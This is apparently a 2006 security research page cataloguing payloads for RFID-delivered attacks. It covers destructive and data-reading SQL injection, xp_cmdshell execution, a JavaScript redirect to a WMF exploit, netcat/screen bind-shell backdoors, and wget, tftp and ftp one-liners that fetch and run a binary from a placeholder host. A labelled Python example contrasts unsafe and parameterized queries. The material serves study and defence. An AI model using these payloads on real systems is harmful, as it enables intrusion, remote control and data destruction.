
Payloads


This page describes the different payloads that can be inserted into viruses and other attacks.

Destroying Data Using SQL Injection


Using standard SQL, it is possible to destroy parts of the database, or the entire database, if the RFID middleware has enough permissions on the database. For example, using the DROP TABLE or DROP DATABASE commands, a single table, or the entire database can be destroyed. Many databases also provide IF ... THEN ... constructs and date functions, which can be used to destroy the database at a predetermined time, allowing the virus to spread to other databases first.

Denial of Service Using SQL Injection


System-management functions provided by databases can also be used to cause problems. For example, Microsoft's SQL Server provides the SHUTDOWN function, which allows the database to be shut down from SQL.

Reading Data from the Database


If a query similar to Query 1 is used to write the tag's data to the database,

UPDATE ContainerContents SET OldContents='%contents%' WHERE TagID='%id%'
Query 1 - Updating known contents

the data in Exploit 1 can be used to issue a SELECT query on the database.

'|| (SELECT ...) ||'
Exploit 1 - SELECT query
In this case, the quotes perform the SQL injection and cause the data to be interpreted as code. The || operator performs string concatenation, causing the result of the SELECT query to be appended to the field in the database. The concatenation operator is required because the quotes from the original query must be reused: they sit immediately before and after the injected data, so they cannot be placed inside the argument list of a concatenation function.
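The injection in Query 1 and Exploit 1, as an added example that is not part of the original page: the same UPDATE built by string substitution beside a parameterized form, plus an allowlist check on the tag data. The table layout, sample rows and the harmless counting SELECT are constructed; it uses Python's sqlite3, whose SQL dialect supports the || operator.

```python
import re
import sqlite3

# Constructed schema; table and column names follow Query 1 on the page.
SCHEMA = "CREATE TABLE ContainerContents (TagID TEXT PRIMARY KEY, OldContents TEXT)"

# Constructed tag data in the shape of Exploit 1: a SELECT that only counts rows.
TAG_DATA = "'|| (SELECT count(*) FROM ContainerContents) ||'"

# Allowlist for what legitimate container contents may look like (assumed policy).
ALLOWED = re.compile(r"[A-Za-z0-9 ,.-]{0,64}")


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute(SCHEMA)
    conn.executemany("INSERT INTO ContainerContents VALUES (?, ?)",
                     [("tag-001", "bananas"), ("tag-002", "apples")])
    return conn


def update_unsafe(conn, tag_id, contents):
    # Query 1 built by string substitution: the tag's bytes become SQL text,
    # so the quotes and || in TAG_DATA are parsed as code.
    sql = "UPDATE ContainerContents SET OldContents='%s' WHERE TagID='%s'" % (contents, tag_id)
    conn.execute(sql)
    conn.commit()


def update_safe(conn, tag_id, contents):
    # Same statement with bound parameters: values travel separately from the
    # SQL text, so the tag data is stored literally, quotes and all.
    conn.execute("UPDATE ContainerContents SET OldContents=? WHERE TagID=?", (contents, tag_id))
    conn.commit()


def read_contents(conn, tag_id):
    row = conn.execute("SELECT OldContents FROM ContainerContents WHERE TagID=?", (tag_id,)).fetchone()
    return row[0] if row else None


def tag_data_is_clean(data):
    # Second line of defence: reject tag data outside the expected alphabet.
    return ALLOWED.fullmatch(data) is not None


def demo():
    # Returns what each variant leaves in the OldContents column for tag-001.
    results = {}
    for name, updater in (("unsafe", update_unsafe), ("safe", update_safe)):
        conn = make_db()
        updater(conn, "tag-001", TAG_DATA)
        results[name] = read_contents(conn, "tag-001")
        conn.close()
    return results
```

With the substituted query the column ends up holding the SELECT's result ("2", the row count); with bound parameters it holds the raw tag string, and the allowlist rejects that string before it reaches the database.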

Executing Shell Commands Using SQL Injection


SQL Server provides the xp_cmdshell procedure, which allows shell commands to be executed.
EXEC Master..xp_cmdshell 'commands';
Exploit 2 - Executing shell commands
In a default setup, only administrators are allowed to use this function, though other users may be granted explicit access.

Client-Side Scripting


The damage that can be done using client-side scripting languages is limited, as the functionality that browsers provide is limited. One capability that all browsers do provide is the ability to navigate to a URL specified from JavaScript. This can be used to direct the browser to a page containing malicious content, such as an image containing an exploit of the recently discovered WMF bug, as shown in Exploit 3.
document.location='http://ip/exploit.wmf';
Exploit 3 - Using client-side scripting to exploit the WMF bug

Server-Side Includes


Server-side includes provide the ability to include the output of an executable file in a webpage, using the exec tag shown in Tag 1.
<!--#exec cmd=""-->
Tag 1 - Exec tag

On some systems, such as the Apache webserver on Linux, the specified command is passed to a new instance of the shell, which allows arbitrary shell commands to be executed. On other systems, such as Apache on Windows, only the path of an executable may be specified, without parameters. For such systems, we have not found any malicious payloads.


Backdoors Using Shell Commands


Apart from obvious commands such as rm, commands like netcat can be used to create backdoors. netcat listens on a TCP port and prints the data it receives. This data can be piped into an instance of the shell, which causes it to be executed, as in the following example:
netcat -lp1234|sh
Exploit 4 - Shell backdoor
which listens on port 1234.

Another system utility that is useful is screen. It creates an instance of the shell and detaches it from its terminal, so that it runs as a daemon process. Combined with the ability to specify the shell's command on the command line, this allows a more advanced backdoor, as in Exploit 5.

screen -dmS t bash -c"while [ true ]; do netcat -lp1234|sh; done"
Exploit 5 - Shell backdoor as a daemon

This exploit runs the previous exploit in an infinite loop, which allows the attacker to connect to the backdoor multiple times.


Executing Code Using Shell Commands


Another favorite is the wget utility. It downloads a file from a web or FTP server and stores it on the local filesystem. It can be used to download a program written by the attacker, which can then be executed.
wget http://ip/myexploit -O /tmp/myexploit; chmod +x /tmp/myexploit; /tmp/myexploit
Exploit 6 - Using wget to download and execute code on Linux

wget is usually not available on Windows systems. In this case, the tftp utility can be used, as in Exploit 7.

tftp -i ip GET myexploit.exe & myexploit
Exploit 7 - Using tftp to download and execute code on Windows

The ftp utility can also be used. It allows all of its commands to be specified in a text file, which can be created on the fly using the echo utility.

(echo anonymous & echo BIN & echo GET myexploit.exe & echo quit) > ftp.txt & ftp -s:ftp.txt ip & myexploit
Exploit 8 - Using ftp to download and execute code on Windows

Binary Code


If binary code can be injected, the only limit on what can be achieved is the size of the RFID tag, though even with a tag of 1 Kb, a lot of damage can be done. One of the ways tags with limited size can be used is to pass a shell command to a function like C's system function, which executes the command in a new instance of the shell. Because of the rich set of utilities that many systems provide, a shell command can do a lot of damage with a limited amount of memory.


Last modified: Thursday, 02 March 2006 15:46, CET